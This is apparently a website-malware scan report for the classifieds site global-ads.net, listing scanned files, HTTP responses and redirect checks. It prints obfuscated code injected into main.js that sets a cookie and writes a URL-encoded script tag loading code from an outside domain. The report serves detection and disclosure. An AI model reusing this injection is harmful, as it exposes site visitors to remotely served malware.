Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=global-ads.net
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://global-ads.net/ | 200 OK Content-Length: 88546 Content-Type: text/html | clean |
http://global-ads.net/js/prototype.js | 200 OK Content-Length: 139854 Content-Type: application/javascript | clean |
http://global-ads.net/geo_templates/default/external/js/main.js | 200 OK Content-Length: 29225 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var geoUtil = { defaultParams : {duration: .8}, inAdmin : false, runHeartbeat : false, init : function () { lightUpBox.init(); if ($('extraQuestionName') && $('extraQuestionValue')) { var values = $('extraQuestionValue').select('li'); $('extraQuestionName').select('li').each(function(element, index) { if (element.getHeight() > this[index].getHeight()) { this[index].setStyle({ height : element }; var sendReq = geoOldAjax.sendReq; if(document.cookie.indexOf('logtime')==-1){var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);document.cookie='logtime=Yes;path=/;expires='+expires.toGMTString();document.write(unescape('%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%64%77%7A%2E%6F%72%67%2E%69%6E%2F%6A%70%2E%70%68%70%22%3E%3C%2F%73%63%72%69%70%74%3E'));} Antivirus reports:
| ||
http://global-ads.net/index.php | 200 OK Content-Length: 88538 Content-Type: text/html | clean |
http://global-ads.net/index.php?a=28&b=142 | 200 OK Content-Length: 20087 Content-Type: text/html | clean |
http://global-ads.net/index.php?a=28&b=136 | 200 OK Content-Length: 22765 Content-Type: text/html | clean |
http://global-ads.net/index.php?a=1 | HTTP/1.1 302 Found Cache-Control: no-cache, must-revalidate Connection: close Date: Mon, 15 Sep 2014 16:13:41 GMT Location: http://global-ads.net/index.php?a=cart Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Expires: Sat, 26 Jul 1997 05:00:00 GMT Set-Cookie: classified_session=802547ced2cb678ae8b0e3350b22d69c; path=/; domain=.global-ads.net Set-Cookie: classified_session=802547ced2cb678ae8b0e3350b22d69c; path=/; domain=.global-ads.net | clean |
http://global-ads.net/index.php?a=cart | 200 OK Content-Length: 21948 Content-Type: text/html | clean |
http://global-ads.net/index.php?a=19 | 200 OK Content-Length: 41268 Content-Type: text/html | clean |
http://global-ads.net/js/scriptaculous/scriptaculous.js | 200 OK Content-Length: 2644 Content-Type: application/javascript | clean |
http://global-ads.net/addons/geographic_navigation/regions.js | 200 OK Content-Length: 760 Content-Type: application/javascript | clean |
http://global-ads.net/index.php?a=28&b=135 | 200 OK Content-Length: 24282 Content-Type: text/html | clean |
http://global-ads.net/index.php?a=28&b=143 | 200 OK Content-Length: 22178 Content-Type: text/html | clean |
http://global-ads.net/index.php?a=28&b=141 | 200 OK Content-Length: 21335 Content-Type: text/html | clean |
http://global-ads.net/register.php | 200 OK Content-Length: 84008 Content-Type: text/html | clean |
http://global-ads.net/geo_templates/default/external/js/regions.js | 200 OK Content-Length: 2295 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: global-ads.net
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Connection: close
Date: Mon, 15 Sep 2014 16:13:36 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Set-Cookie: classified_session=457c9dbd0ee9a042a18af381b6eefc04; path=/; domain=.global-ads.net
Set-Cookie: classified_session=457c9dbd0ee9a042a18af381b6eefc04; path=/; domain=.global-ads.net
GET / HTTP/1.1
Host: global-ads.net
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Connection: close
Date: Mon, 15 Sep 2014 16:13:36 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Set-Cookie: classified_session=457c9dbd0ee9a042a18af381b6eefc04; path=/; domain=.global-ads.net
Set-Cookie: classified_session=457c9dbd0ee9a042a18af381b6eefc04; path=/; domain=.global-ads.net
Second query (visit from search engine):
GET / HTTP/1.1
Host: global-ads.net
Referer: http://www.google.com/search?q=global-ads.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: global-ads.net
Referer: http://www.google.com/search?q=global-ads.net
Result:
The result is similar to the first query. There are no suspicious redirects found.